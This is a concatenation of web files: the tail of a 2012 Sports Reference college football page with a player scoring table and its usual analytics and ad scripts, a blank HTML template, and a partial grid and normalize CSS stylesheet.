href="/cfb/players/marshawn-lynch-1.html">Marshawn Lynch</a></td> <td align="right" >11</td> <td align="right" >4</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >15</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >90</td> </tr> <tr class=""> <td align="right" csk="3">3</td> <td align="left" csk="Jackson,Desean"><a href="/cfb/players/desean-jackson-1.html">Desean Jackson</a></td> <td align="right" ></td> <td align="right" >9</td> <td align="right" ></td> <td align="right" ></td> <td align="right" >4</td> <td align="right" ></td> <td align="right" ></td> <td align="right" >13</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >78</td> </tr> <tr class=""> <td align="right" csk="4">4</td> <td align="left" csk="Forsett,Justin"><a href="/cfb/players/justin-forsett-1.html">Justin Forsett</a></td> <td align="right" >4</td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" >32</td> </tr> <tr class=""> <td align="right" csk="5">5</td> <td align="left" csk="Hawkins,Lavelle"><a href="/cfb/players/lavelle-hawkins-1.html">Lavelle Hawkins</a></td> <td align="right" ></td> <td align="right" >5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >30</td> </tr> <tr class=""> <td align="right" csk="6">6</td> <td align="left" csk="Jordan,Robert"><a href="/cfb/players/robert-jordan-1.html">Robert Jordan</a></td> <td align="right" ></td> <td align="right" >4</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >4</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >24</td> </tr> <tr class=""> <td align="right" csk="7">7</td> <td align="left" csk="Longshore,Nate"><a href="/cfb/players/nate-longshore-1.html">Nate Longshore</a></td> <td align="right" >3</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >3</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >18</td> </tr> <tr class=""> <td align="right" csk="8">8</td> <td align="left" csk="Hughes,Daymeion"><a href="/cfb/players/daymeion-hughes-1.html">Daymeion Hughes</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >12</td> </tr> <tr class=""> <td align="right" csk="9">9</td> <td align="left" csk="Ayoob,Joe"><a href="/cfb/players/joe-ayoob-1.html">Joe Ayoob</a></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" >8</td> </tr> <tr class=""> <td align="right" csk="10">10</td> <td align="left" csk="Thompson,Syd'Quan"><a href="/cfb/players/sydquan-thompson-1.html">Syd'Quan Thompson</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="11">11</td> <td align="left" csk="Pimentel,Mickey"><a href="/cfb/players/mickey-pimentel-1.html">Mickey Pimentel</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="12">12</td> <td align="left" csk="Schutte,Bryan"><a href="/cfb/players/bryan-schutte-1.html">Bryan Schutte</a></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="13">13</td> <td align="left" csk="O'Keith,Marcus"><a href="/cfb/players/marcus-okeith-1.html">Marcus O'Keith</a></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="14">14</td> <td align="left" csk="Morrah,Cameron"><a href="/cfb/players/cameron-morrah-1.html">Cameron Morrah</a></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="15">15</td> <td align="left" csk="Stevens,Craig"><a href="/cfb/players/craig-stevens-1.html">Craig Stevens</a></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >6</td> </tr> <tr class=""> <td align="right" csk="16">16</td> <td align="left" csk="Mebane,Brandon"><a href="/cfb/players/brandon-mebane-1.html">Brandon Mebane</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >2</td> </tr> </tbody> </table> </div> </div> <div id="sr_js"></div> <script type="text/javascript"> (function () { var sr_js_file = 'http://d2ft4b0ve1aur1.cloudfront.net/js-237/sr-cfb-min.js'; if (sr_gzipEnabled) { sr_js_file = 'http://d2ft4b0ve1aur1.cloudfront.net/js-237/sr-cfb-min.js.jgz'; } var sr_script_tag = document.getElementById("sr_js"); if (sr_script_tag) { var scriptStyles = document.createElement("script"); scriptStyles.type = "text/javascript"; scriptStyles.src = sr_js_file; sr_script_tag.appendChild(scriptStyles); //alert('adding js to footer:'+sr_js_file); } }()); </script> <div id="site_footer"> <div class="margin border"> <script type="text/javascript"> //<!-- google_ad_client = "ca-pub-5319453360923253"; /* Page Bottom - CFB */ google_ad_slot = "6637784901"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/deferscript" defersrc="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script> </div> <div id="sr_footer"> Copyright &copy; 2000-2012 <a href="http://www.sports-reference.com">Sports Reference LLC</a>. All rights reserved. <form class="inline margin_left" method="get" name="f_footer" action="/cfb/search.cgi"> <input x-webkit-speech type="text" id="search_footer" name="search" class="search long"> <input type="submit" value="Search" class="submit"> </form> <div class="blockquote clear_both margin_top"> <a href="http://www.sports-reference.com/">A Sports Reference Site</a>: <a href="/cfb/about/">About SR/CFB</a>&nbsp;| <a href="/cfb/feedback/">Found a bug or have a suggestion?</a><br> <a href="http://www.sports-reference.com/privacy.shtml">Privacy Statement</a>&nbsp;| <a href="http://www.sports-reference.com/termsofuse.shtml">Conditions &amp; Terms of Service</a> | <a href="http://www.sports-reference.com/data_use.shtml">Use of Data</a> </div> <div class="blockquote italic_text clear_both margin_top"> Some school's results have been altered by retroactive NCAA penalties. As a matter of policy, Sports Reference only report the results of games as played on the field. See our list of <a href="/cfb/friv/forfeits.cgi">forfeits and vacated games</a> for more details. </div> <div class="blockquote clear_both margin_top margin_bottom"> Part of the <a target="_blank" title="USA TODAY Sports" href="http://Sports.USATODAY.com/">USA TODAY Sports Media Group</a>. </div> </div><!-- div#sr_footer --> </div><!-- div#site_footer --> <!-- google +1 code --> <script type="text/deferscript"> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <!-- google analytics code --> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._createTracker("UA-1890630-11"); pageTracker._setCookiePath("/cfb/"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); var sr_tracker = _gat._createTracker("UA-1890630-9"); sr_tracker._setDomainName('none'); sr_tracker._setAllowLinker(true); sr_tracker._setAllowHash(false); sr_tracker._setCustomVar(1,"site","cfb",3); sr_tracker._trackPageview(); } catch(err) {}</script> <!-- End Google Analytics Tag --> <!-- Begin comScore Tag --> <script type="text/deferscript"> document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E")); </script> <script type="text/deferscript"> COMSCORE.beacon({ c1:2, c2:"6035210", c3:"", c4:"www.sports-reference.com/cfb", c5:"", c6:"", c15:"" }); </script> <noscript> <img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6035210&amp;c3=&amp;c4=www.sports-reference.com/cfb&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="" /> </noscript> <!-- End comScore Tag --> <script type="text/deferscript"> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=220051088022369"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <!-- google +1 code --> <script type="text/deferscript"> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> </div> </body> </html>
a.html
sashyn4ik19/test_html_css
<!doctype html> <html lang=ru> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body> <div class="main"> <div class="row"> <div class="container"> </div> </div> </div> </body> </html>
docs/accessibility-helpers/2.0.1/tests/WBG/assets/css/gui.css
WestpacCXTeam/GUI-source
/*!_colors v3.0.0*/ /* * SETTINGS */ /*!_fonts v2.0.3*/ /* * SETTINGS */ /* * SETTINGS */ .body-font { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } .brand-font { font-family: "Times New Roman", "Times", serif; } /*!_grid v2.0.0*/ .clearfix:before, .clearfix:after, .container-fluid:before, .container-fluid:after, .container:before, .container:after, .row:before, .row:after { content: " "; display: table; } .clearfix:after, .container-fluid:after, .container:after, .row:after { clear: both; } *, *:after, *:before { box-sizing: border-box; } .container, .container-fluid { margin-right: auto; margin-left: auto; padding-left: 12px; padding-right: 12px; } @media (min-width: 768px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 768px) { .container { width: 744px; } } @media (min-width: 992px) { .container { width: 960px; } } @media (min-width: 1200px) { .container { width: 1164px; } } @media (min-width: 768px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } .row { margin-left: -6px; margin-right: -6px; } @media (min-width: 768px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 992px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 1200px) { .row { margin-left: -12px; margin-right: -12px; } } .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { position: relative; min-height: 1px; padding-left: 6px; padding-right: 6px; } @media (min-width: 768px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666667%; } .col-xs-10 { width: 83.33333333%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666667%; } .col-xs-7 { width: 58.33333333%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666667%; } .col-xs-4 { width: 33.33333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666667%; } .col-xs-pull-10 { right: 83.33333333%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666667%; } .col-xs-pull-7 { right: 58.33333333%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666667%; } .col-xs-pull-4 { right: 33.33333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.66666667%; } .col-xs-pull-1 { right: 8.33333333%; } .col-xs-pull-0 { right: auto; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666667%; } .col-xs-push-10 { left: 83.33333333%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666667%; } .col-xs-push-7 { left: 58.33333333%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666667%; } .col-xs-push-4 { left: 33.33333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.66666667%; } .col-xs-push-1 { left: 8.33333333%; } .col-xs-push-0 { left: auto; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-xs-offset-10 { margin-left: 83.33333333%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666667%; } .col-xs-offset-7 { margin-left: 58.33333333%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666667%; } .col-xs-offset-4 { margin-left: 33.33333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.66666667%; } .col-xs-offset-1 { margin-left: 8.33333333%; } .col-xs-offset-0 { margin-left: 0; } @media (min-width: 768px) { .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666667%; } .col-sm-7 { width: 58.33333333%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666667%; } .col-sm-4 { width: 33.33333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.66666667%; } .col-sm-1 { width: 8.33333333%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666667%; } .col-sm-pull-10 { right: 83.33333333%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666667%; } .col-sm-pull-7 { right: 58.33333333%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666667%; } .col-sm-pull-4 { right: 33.33333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.66666667%; } .col-sm-pull-1 { right: 8.33333333%; } .col-sm-pull-0 { right: auto; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666667%; } .col-sm-push-10 { left: 83.33333333%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666667%; } .col-sm-push-7 { left: 58.33333333%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666667%; } .col-sm-push-4 { left: 33.33333333%; } .col-sm-push-3 { left: 25%; } .col-sm-push-2 { left: 16.66666667%; } .col-sm-push-1 { left: 8.33333333%; } .col-sm-push-0 { left: auto; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666667%; } .col-sm-offset-10 { margin-left: 83.33333333%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666667%; } .col-sm-offset-7 { margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 { margin-left: 33.33333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.66666667%; } .col-sm-offset-1 { margin-left: 8.33333333%; } .col-sm-offset-0 { margin-left: 0; } } @media (min-width: 992px) { .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666667%; } .col-md-10 { width: 83.33333333%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666667%; } .col-md-7 { width: 58.33333333%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666667%; } .col-md-4 { width: 33.33333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.66666667%; } .col-md-1 { width: 8.33333333%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666667%; } .col-md-pull-10 { right: 83.33333333%; } .col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666667%; } .col-md-pull-7 { right: 58.33333333%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666667%; } .col-md-pull-4 { right: 33.33333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.66666667%; } .col-md-pull-1 { right: 8.33333333%; } .col-md-pull-0 { right: auto; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666667%; } .col-md-push-10 { left: 83.33333333%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666667%; } .col-md-push-7 { left: 58.33333333%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666667%; } .col-md-push-4 { left: 33.33333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.66666667%; } .col-md-push-1 { left: 8.33333333%; } .col-md-push-0 { left: auto; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666667%; } .col-md-offset-10 { margin-left: 83.33333333%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666667%; } .col-md-offset-7 { margin-left: 58.33333333%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666667%; } .col-md-offset-4 { margin-left: 33.33333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.66666667%; } .col-md-offset-1 { margin-left: 8.33333333%; } .col-md-offset-0 { margin-left: 0; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666667%; } .col-lg-10 { width: 83.33333333%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666667%; } .col-lg-7 { width: 58.33333333%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666667%; } .col-lg-4 { width: 33.33333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.66666667%; } .col-lg-1 { width: 8.33333333%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666667%; } .col-lg-pull-10 { right: 83.33333333%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666667%; } .col-lg-pull-7 { right: 58.33333333%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666667%; } .col-lg-pull-4 { right: 33.33333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.66666667%; } .col-lg-pull-1 { right: 8.33333333%; } .col-lg-pull-0 { right: auto; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666667%; } .col-lg-push-10 { left: 83.33333333%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666667%; } .col-lg-push-7 { left: 58.33333333%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666667%; } .col-lg-push-4 { left: 33.33333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.66666667%; } .col-lg-push-1 { left: 8.33333333%; } .col-lg-push-0 { left: auto; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666667%; } .col-lg-offset-10 { margin-left: 83.33333333%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666667%; } .col-lg-offset-7 { margin-left: 58.33333333%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666667%; } .col-lg-offset-4 { margin-left: 33.33333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.66666667%; } .col-lg-offset-1 { margin-left: 8.33333333%; } .col-lg-offset-0 { margin-left: 0; } } .container { padding-right: 12px; padding-left: 12px; } @media (min-width: 768px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 992px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 1200px) { .container { padding-right: 24px; padding-left: 24px; } } /*!_text-styling v4.0.3*/ /*! normalize.css v4.2.0 | MIT License | github.com/necolas/normalize.css */ /** * 1. Change the default font family in all browsers (opinionated). * 2. Correct the line height in all browsers. * 3. Prevent adjustments of font size after orientation changes in IE and iOS. */ /* Document ========================================================================== */ html { font-family: sans-serif; /* 1 */ line-height: 1.15; /* 2 */ -ms-text-size-adjust: 100%; /* 3 */ -webkit-text-size-adjust: 100%; /* 3 */ } /* Sections ========================================================================== */ /** * Remove the margin in all browsers (opinionated). */ body { margin: 0; } /** * Add the correct display in IE 9-. */ article, aside, footer, header, nav, section { display: block; } /** * Correct the font size and margin on `h1` elements within `section` and * `article` contexts in Chrome, Firefox, and Safari. */ h1 { font-size: 2em; margin: 0.67em 0; } /* Grouping content ========================================================================== */ /** * Add the correct display in IE 9-. * 1. Add the correct display in IE. */ figcaption, figure, main { /* 1 */ display: block; } /** * Add the correct margin in IE 8. */ figure { margin: 1em 40px; } /** * 1. Add the correct box sizing in Firefox. * 2. Show the overflow in Edge and IE. */ hr { box-sizing: content-box; /* 1 */ height: 0; /* 1 */ overflow: visible; /* 2 */ } /** * 1. Correct the inheritance and scaling of font size in all browsers. * 2. Correct the odd `em` font sizing in all browsers. */ pre { font-family: monospace, monospace; /* 1 */ font-size: 1em; /* 2 */ } /* Text-level semantics ========================================================================== */ /** * 1. Remove the gray background on active links in IE 10. * 2. Remove gaps in links underline in iOS 8+ and Safari 8+. */ a { background-color: transparent; /* 1 */ -webkit-text-decoration-skip: objects; /* 2 */ } /** * Remove the outline on focused links when they are also active or hovered * in all browsers (opinionated). */ a:active, a:hover { outline-width: 0; } /** * 1. Remove the bottom border in Firefox 39-. * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari. */ abbr[title] { border-bottom: none; /* 1 */ text-decoration: underline; /* 2 */ text-decoration: underline dotted; /* 2 */ } /** * Prevent the duplicate application of `bolder` by the next rule in Safari 6. */ b, strong { font-weight: inherit; } /** * Add the correct font weight in Chrome, Edge, and Safari. */ b, strong { font-weight: bolder; } /** * 1. Correct the inheritance and scaling of font size in all browsers. * 2. Correct the odd `em` font sizing in all browsers. */ code, kbd, samp { font-family: monospace, monospace; /* 1 */ font-size: 1em; /* 2 */ } /** * Add the correct font style in Android 4.3-. */ dfn { font-style: italic; } /** * Add the correct background and color in IE 9-. */ mark { background-color: #ff0; color: #000; } /** * Add the correct font size in all browsers. */ small { font-size: 80%; } /** * Prevent `sub` and `sup` elements from affecting the line height in * all browsers. */ sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sub { bottom: -0.25em; } sup { top: -0.5em; } /* Embedded content ========================================================================== */ /** * Add the correct display in IE 9-. */ audio, video { display: inline-block; } /** * Add the correct display in iOS 4-7. */ audio:not([controls]) { display: none; height: 0; } /** * Remove the border on images inside links in IE 10-. */ img { border-style: none; } /** * Hide the overflow in IE. */ svg:not(:root) { overflow: hidden; } /* Forms ========================================================================== */ /** * 1. Change the font styles in all browsers (opinionated). * 2. Remove the margin in Firefox and Safari. */ button, input, optgroup, select, textarea { font-family: sans-serif; /* 1 */ font-size: 100%; /* 1 */ line-height: 1.15; /* 1 */ margin: 0; /* 2 */ } /** * Show the overflow in IE. * 1. Show the overflow in Edge. */ button, input { /* 1 */ overflow: visible; } /** * Remove the inheritance of text transform in Edge, Firefox, and IE. * 1. Remove the inheritance of text transform in Firefox. */ button, select { /* 1 */ text-transform: none; } /** * 1. Prevent a WebKit bug where (2) destroys native `audio` and `video` * controls in Android 4. * 2. Correct the inability to style clickable types in iOS and Safari. */ button, html [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; /* 2 */ } /** * Remove the inner border and padding in Firefox. */ button::-moz-focus-inner, [type="button"]::-moz-focus-inner, [type="reset"]::-moz-focus-inner, [type="submit"]::-moz-focus-inner { border-style: none; padding: 0; } /** * Restore the focus styles unset by the previous rule. */ button:-moz-focusring, [type="button"]:-moz-focusring, [type="reset"]:-moz-focusring, [type="submit"]:-moz-focusring { outline: 1px dotted ButtonText; } /** * Change the border, margin, and padding in all browsers (opinionated). */ fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } /** * 1. Correct the text wrapping in Edge and IE. * 2. Correct the color inheritance from `fieldset` elements in IE. * 3. Remove the padding so developers are not caught out when they zero out * `fieldset` elements in all browsers. */ legend { box-sizing: border-box; /* 1 */ color: inherit; /* 2 */ display: table; /* 1 */ max-width: 